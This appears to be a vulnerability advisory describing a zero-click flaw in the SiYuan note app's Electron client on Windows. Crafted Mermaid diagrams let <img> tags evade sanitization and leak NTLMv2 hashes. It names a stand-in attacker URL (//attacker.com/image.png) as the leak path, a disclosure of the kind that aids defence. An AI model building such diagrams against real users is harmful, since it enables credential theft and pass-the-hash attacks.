SiYuan, a personal knowledge management system, allows Mermaid diagrams to be rendered with settings that enable HTML labels and a ‘loose’ security level. In this configuration <img> tags can escape the internal DOMPurify filter and end up inside SVG foreignObject blocks. The SVG content is injected into the page using innerHTML without additional sanitization, leading to a zero‑click vulnerability. When a user opens a note containing a malicious Mermaid diagram, the Electron client automatically fetches the image URL. On Windows, a protocol‑relative URL such as //attacker.com/image.png resolves to a UNC path, which triggers SMB authentication and causes Windows to send the victim’s NTLMv2 hash to the target. The attacker can capture this credential and later use it in pass‑the‑hash attacks or other credential‑based exploitation scenarios.

The issue affects the SiYuan application version 3.6.3 and earlier. The vulnerable component is the Electron client running on Windows operating systems. The affected environment includes any user who opens a note containing a Mermaid diagram with an image reference that can resolve to a UNC path. The vendor product is Siyuan-Note Siyuan.

The CVSS score for this vulnerability is 8.7, indicating high severity. While an EPSS score is not provided, the zero‑click nature and the ability to exfiltrate NTLM hashes without user interaction suggest a high likelihood of exploitation in environments where users work with potentially untrusted content. The vulnerability is not currently listed in the CISA KEV catalog. Attacks require only the user to open a malicious note; no additional permissions or input are necessary beyond normal use of the application.